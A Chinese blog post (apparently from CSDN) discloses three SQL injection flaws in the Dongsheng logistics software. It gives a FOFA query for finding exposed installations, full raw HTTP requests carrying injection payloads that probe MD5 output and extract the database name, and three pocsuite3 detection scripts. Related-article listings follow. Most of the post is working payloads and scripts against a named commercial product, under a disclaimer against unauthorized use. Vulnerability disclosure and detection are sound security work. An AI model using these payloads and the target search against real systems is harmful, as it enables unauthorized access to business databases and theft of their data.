某胜物流软件三个接口sql注入漏洞(附漏洞检测脚本)

最新推荐文章于 2024-08-31 19:45:21 发布
最新推荐文章于 2024-08-31 19:45:21 发布
阅读量1.2k 收藏 6
点赞数 9
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/136256614
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

东胜物流软件三个接口存在SQL注入漏洞

fofa语句

body="CompanysAdapter.aspx"

poc加检测

GetDataList接口

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=DrvCode%20like%20%27%1%%27%20and%20DrvName%20like%20%27%1%%27%20and%20JzNo%20like%20%27%1%%27%20and%20OrgCode%20like%20%27%1%%27%20AND%204045%20IN%20(select%20sys.fn_sqlvarbasetostr(hashbytes(%27MD5%27,%275%27)))--%20IkbK&page=1 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

TCodeVoynoAdapter.aspx接口

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+substring%28sys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%275%27%29%29%2C3%2C32%29%3E0%3B-- HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0

SaveUserQuerySetting接口

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: 
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

poc脚本

脚本使用pocsuite框架

GetDataList接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_getdatalist_sql(POCBase):
    pocDesc = '''东胜物流软件-GetDataList接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-GetDataList接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=DrvCode%20like%20%27%1%%27%20and%20DrvName%20like%20%27%1%%27%20and%20JzNo%20like%20%27%1%%27%20and%20OrgCode%20like%20%27%1%%27%20AND%204045%20IN%20(select%20sys.fn_sqlvarbasetostr(hashbytes(%27MD5%27,%275%27)))--%20IkbK&page=1'

        headers = {
            "User-Agent": "Mozilla/5.0"
        }

        try:

            response = requests.get(url, headers=headers)
            if response.status_code == 500 and 'e4da3b7fbbce2345d7772b0674a318d5' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_getdatalist_sql)

TCodeVoynoAdapter.aspx接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_tcodevoynoadapter_sql(POCBase):
    pocDesc = '''东胜物流软件-TCodeVoynoAdapter.aspx接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-TCodeVoynoAdapter.aspx接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+substring%28sys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%275%27%29%29%2C3%2C32%29%3E0%3B--'

        headers = {
            "User-Agent": "Mozilla/5.0"
        }

        try:

            response = requests.get(url, headers=headers)
            if response.status_code == 500 and 'e4da3b7fbbce2345d7772b0674a318d5' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_tcodevoynoadapter_sql)

SaveUserQuerySetting接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_saveuserquerysetting_sql(POCBase):
    pocDesc = '''东胜物流软件-SaveUserQuerySetting接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-SaveUserQuerySetting接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/MvcShipping/MsBaseInfo/SaveUserQuerySetting'

        headers = {
            "User-Agent": "Mozilla/5.0",
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip'
        }

        try:
            data="formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}"
            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200 and 'qxpqq' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_saveuserquerysetting_sql)

炼金术师诸葛亮
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
东胜物流软件 多处 SQL注入漏洞复现
0xSec
11-27 1140
东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting、/Shipping/CompanysAccountGridSource.aspx、/FeeCodes/OPERATORCODEAdapter.aspx等接口存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权
东胜物流软件 GetProParentModuTreeList SQL注入漏洞复现
0xSec
06-13 489
东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026)
weixin_43167326的博客
05-10 583
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! CVE-2024-26026是BIG-IP Next Central Manager中的SQL注入漏洞。未经身份验证的远程攻击者可以通过向易受攻击的Next Central Manager API端点发送
bs架构 erp 进销存_理事单位业务推介东胜物流软件专业铁路物流ERP货代软件
weixin_35992880的博客
12-05 440
公司简介青岛东胜伟业软件有限公司初创于2004年11月(前身为青岛景宏物流信息技术有限公司),公司主要业务范围为航运物流相关环节的产品和服务。目前总共有员工30余人,大部分具有多年航运物流信息化经验。其中货代软件产品用户近1600家,在青岛口岸市场占有率超过30%,具有良好的口碑和广泛的覆盖率。东胜软件致力于为客户提供IT支撑的SOP,帮助客户大幅提高工作效率,降低各个环节的潜在风...
SQL 注入漏洞检测与利用
CSDN
03-31 5994
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.
PHP代码审计4—Sql注入漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-18 2318
SQL注入代码审计入门
Web安全SQL注入漏洞测试.(手动测试)
网络安全领域___专研者.
04-20 2663
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
SRC之SQL注入漏洞挖掘实战
aokaomo的博客
12-26 1528
1、什么是 SRC?3、SRC 漏洞的类型 SRC 漏洞可以分为诸如 SQL 注入、跨站点脚本攻击(XSS)、跨站请求伪造(CSRF)、代码注入等许多类型(该知识点也是我在微信公众号推文看到的,如有侵权,请联系我,立马删除,另外该公众号为“id=96 公司(在后面加个公司是为了防止搜出来的全是英文,国内是无法使用谷歌的,得有点魔法才行,或者可以使用谷歌镜像,这里给个链接。2、SRC 的工作过程 SRC 的成员发现漏洞,确认漏洞,报告漏洞,修复漏洞,并公开发布漏洞信息和修复信息。
sql注入漏洞和sqlmap的使用
hmysn的博客
07-07 2103
目录什么是sql漏洞:sql语言:数据库和网页用户请求的原理:sql注入原理:sql注入检测sql注入检测工具:实例演示:漏洞防御 这边采用了皮卡丘的sql漏洞的概述: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
【实战篇】第20篇:SQL二次编码注入漏洞实例(tamper脚本)1
08-03
如果我们传入双重url编码的字符串,将绕过非法字符检测,然后经urldecode解码,带入数据库中执行,导致SQL注入漏洞存在。 三、漏洞利用 1. 双重URLencode编码绕过:通过编写tamper脚本,可以绕过URLencode双重编码...
基于机器学习的SQL注入漏洞挖掘技术的分析与实现.pdf
09-19
SQL注入漏洞是一种安全漏洞,攻击者可以通过这个漏洞操控数据库查询语句,窃取或篡改数据库中的数据,这对于Web应用的数据库安全构成了巨大威胁。 二、SQL注入漏洞的传统挖掘技术 传统的SQL注入漏洞挖掘技术主要...
S-CMS PHP v30存在SQL注入漏洞1
08-03
S-CMS PHP v3.0的这个SQL注入漏洞主要出现在/js/scms.php文件的第182-204行。问题在于程序在第83行接收了通过POST方式传递的pageid值,并在第87行和第95行直接将其拼接到SQL查询语句中,没有进行充分的过滤和验证。...
PHP 小心urldecode引发的SQL注入漏洞
10-28
开发者如果在没有充分理解这一机制的情况下,自行对这些数据再使用urldecode函数,就会导致数据被过度解码,进而可能引发SQL注入漏洞。 文章中提到的DiscuzX1.5论坛被黑案例就是这样一个典型的实例。开发者在处理...
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 1234
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
【网络安全】网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 432
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
安全入门day.03
最新发布
mxxcxy的博客
08-31 905
Fiddler是一款强大的HTTP调试代理工具,它以代理服务器的形式工作,通过监听和记录HTTP(s)通讯,帮助用户检查、设置断点以及修改所有进出数据(如cookie、HTML、JS、CSS等文件)。Fiddler不仅简单易用,还提供了用户友好的界面和丰富的功能,如支持断点调试、请求构造、性能数据分析等,使得开发人员和测试人员能够轻松地进行Web调试和性能测试。此外,Fiddler还包含一个基于JScript .NET的事件脚本子系统,支持使用.NET框架语言进行扩展,进一步增强了其灵活性和功能性。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 500
SaveButton 安全控件说明
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值